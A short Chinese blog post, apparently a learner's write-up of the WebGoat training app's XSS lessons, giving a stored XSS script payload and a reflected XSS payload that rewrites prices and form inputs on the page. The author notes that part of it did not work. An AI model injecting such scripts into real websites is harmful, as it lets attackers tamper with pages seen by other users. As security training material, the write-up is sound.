WebGoat——XSS Attacks(part 2)

1、存储型

脚本:><script>alert('just for fun')</script>


------------------------------------------------------------------------------------------------------------------------------------------------------------

2、反射型


题意:通过反射型XSS,修改页面数据来达到攻击的目的。

大哭有点难度,参考答案做的。。。)

代码如下

'><script>
alert('This kinda is called reflected XSS or First-Order XSS!');
for(i=0;i<=document.getElementsByTagName("td").length-1;i++)
{
	if(document.getElementsByTagName("td")[i].innerHTML.indexOf('$')>0)
	{
		document.getElementsByTagName("td")[i].innerHTML = '$0';<!--找到$符号,将$符号后面的值都替换为0-->
	}
};
for(i=0;i<=document.getElementsByTagName("input").length-1;i++)
{
	if(document.getElementsByTagName("input")[i].type=='text')
	{
		document.getElementsByTagName("input")[i].value='10000';<!--找到文本域(text),将文本域里的值都替换为10000-->
	}
};
</script>

效果:



第一个篡改,修改$后值为0,不知道为什么没有生效。。。原因还不晓得。。。。


------------------------------------------------------------------------------------------------------------------------------------------------------------





  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值